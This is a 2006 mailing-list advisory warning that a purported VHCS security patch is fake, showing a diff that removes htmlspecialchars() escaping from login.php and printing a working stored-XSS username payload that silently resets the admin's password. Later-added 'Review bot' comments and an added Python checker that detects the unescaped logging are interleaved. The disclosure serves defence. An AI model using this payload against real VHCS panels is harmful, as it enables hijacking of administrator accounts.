Message-ID: <43E65B67.8000707@rs-labs.com>
Date: Sun Feb 5 20:09:32 2006
From: roman at rs-labs.com (Roman Medina-Heigl Hernandez)
Subject: VHCS Security Patch - 2006-02-05 --> Fake!
Hi,
I've just visited VHCS main page and noticed the following "security patch":
http://vhcs.net/new/modules/news/article.php?storyid=23
It reads:
"This patch is for all VHCS versions.
You have to update only one GUI file - /vhcs2/gui/include/login.php
Just replace the file
"
Well, just do NOT apply it!!!! It's a fake! Indeed, it will leave your
VHCS installation vulnerable to a high-severity cross-site scripting (XSS) issue!
See it:
login_orig_unix.php --> original 2.4.7.1 login.php (converted to Unix)
login_new_unix.php --> login.php from "security patch"
roman@...labs:~$ diff login_orig_unix.php login_new_unix.php
38c38
< write_log("Login error, <b><i>".htmlspecialchars($uname,
ENT_QUOTES, "UTF-8")."</i></b> unknown username");
---
> write_log("Login error, <b><i>".$uname."</i></b> unknown
username");
75c75
<
write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
is not OK - user can not login");
---
>
write_log( $uname." Domain status is not OK - user can not login");
104c104
< write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user logged in.");
---
> write_log( $uname." user logged in.");
112c112
< write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad password login data.");
---
> write_log( $uname." bad password login data.");
190c190
< write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user session timed out");
---
> write_log($uname." user session timed out");
199c199
< write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad session data.");
---
> write_log($uname." bad session data.");
258a259
> die();
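Review bot: an unconditional die(); is inserted after line 258 with no surrounding lines in this hunk, so it is impossible to tell from the diff whether it sits inside a branch or terminates every request at that point; the full context of lines 255-265 is needed before this can be judged.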
261a263
> }
437c439
< }
---
> //}
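Review bot: commenting out the closing brace at line 437 while a new `}` is added after line 261 moves the end of some block roughly 175 lines earlier, which changes what code runs inside that block; a diff without context lines cannot show which block is affected, so the full file should be reviewed rather than this hunk applied blind.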
roman@...labs:~$
As you can see, the "patch" removes the htmlspecialchars() calls, leaving
login.php vulnerable. Nasty...
If you apply the "patch" (or have an old VHCS install, for instance
version <= 2.4.6.2), the XSS bug is active. Just for fun, you can
exploit it by entering the following as the "username" on the login
page:
</form><form name="dsr" method="post" action="ch%61nge_password.php"><input
name="pass" value="hackme"><input name="pass_rep" value="hackme"><input
name="uaction"
value="updt_pass"></form><script>document.dsr.submit()</script>
When the VHCS admin enters the "Admin Log" page (in the VHCS menu)... his
password will be set to "hackme" :-) The %61 trick is necessary to
bypass some string substitution. This exploit combines the XSS bug with
what I see as a poor security design bug, which is allowing the
password to be changed without supplying the old one (Alex, please, fix
it in the next release!).
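The following is an added example in Python, written for this page and not code from VHCS or from the post's author. It does two things a practitioner would want after reading the diff above: it scans a login.php source for write_log() calls that log $uname without the htmlspecialchars($uname, ENT_QUOTES, ...) wrapper (so you can tell whether the fake "patch", or an old version, is installed), and it models how one log entry is rendered on the "Admin Log" page with and without that escaping, using the post's own payload. The two sample sources are constructed here from the diff lines in the post; the rendering model, the function names and the table markup are this example's assumptions, since the real Admin Log template is not shown on the page.

```python
"""Check a VHCS login.php for write_log() calls that log $uname unescaped.

Added example, not VHCS code. The two sample sources below are
constructed from the diff in the post: the original 2.4.7.1 lines wrap
$uname in htmlspecialchars($uname, ENT_QUOTES, "UTF-8"); the fake
"security patch" logs the raw value.
"""
import html
import re

# Constructed sample: original login.php lines (one call wrapped across
# two lines, as it appears in the diff), all escaped.
ORIGINAL_LOGIN_PHP = r'''<?php
if ($user_unknown) {
    write_log("Login error, <b><i>".htmlspecialchars($uname, ENT_QUOTES, "UTF-8")."</i></b> unknown username");
}
write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
is not OK - user can not login");
'''

# Constructed sample: the same lines after the fake "patch".
FAKE_PATCH_LOGIN_PHP = r'''<?php
if ($user_unknown) {
    write_log("Login error, <b><i>".$uname."</i></b> unknown username");
}
write_log( $uname." Domain status
is not OK - user can not login");
'''

# The username payload from the post, used as the logged value.
PAYLOAD = ('</form><form name="dsr" method="post" action="ch%61nge_password.php">'
           '<input name="pass" value="hackme"><input name="pass_rep" value="hackme">'
           '<input name="uaction" value="updt_pass"></form>'
           '<script>document.dsr.submit()</script>')

# A write_log(...) call up to the ");" that ends it; DOTALL lets a call
# wrapped across lines match. Non-greedy so the inner htmlspecialchars(...)
# does not end the match early (its ")" is followed by ".", not ";").
WRITE_LOG_CALL = re.compile(r'write_log\s*\((.*?)\)\s*;', re.DOTALL)
ESCAPED_UNAME = re.compile(r'htmlspecialchars\s*\(\s*\$uname\s*,\s*ENT_QUOTES')


def unescaped_uname_log_lines(source: str) -> list:
    """Return 1-based line numbers of write_log() calls whose arguments
    use $uname without htmlspecialchars($uname, ENT_QUOTES, ...)."""
    bad = []
    for m in WRITE_LOG_CALL.finditer(source):
        args = m.group(1)
        if '$uname' in args and not ESCAPED_UNAME.search(args):
            bad.append(source.count('\n', 0, m.start()) + 1)
    return bad


def log_entry_html(uname: str, escape: bool) -> str:
    """Model (an assumption, not the real template) of the Admin Log page
    rendering one logged username inside a table cell. escape=True
    stands in for the original htmlspecialchars(..., ENT_QUOTES, "UTF-8")
    call: html.escape(quote=True) escapes the same five characters
    (& < > " '), differing only in the entity used for a single quote."""
    value = html.escape(uname, quote=True) if escape else uname
    return f"<tr><td>{value} user logged in.</td></tr>"


if __name__ == "__main__":
    print("original :", unescaped_uname_log_lines(ORIGINAL_LOGIN_PHP))
    print("fake patch:", unescaped_uname_log_lines(FAKE_PATCH_LOGIN_PHP))
    print("unescaped :", log_entry_html(PAYLOAD, escape=False))
    print("escaped   :", log_entry_html(PAYLOAD, escape=True))
```

Run it against your real /vhcs2/gui/include/login.php by reading the file into unescaped_uname_log_lines(): an empty list means every $uname log call is escaped as in 2.4.7.1, a non-empty list gives the line numbers to inspect. The rendering model shows why the escaping matters: unescaped, the payload's form and script land in the admin's page as live markup; escaped, they are inert text.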
Summarizing, my recommendation: use VHCS 2.4.7.1, don't apply patch.
--
Cheers,
-Roman
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]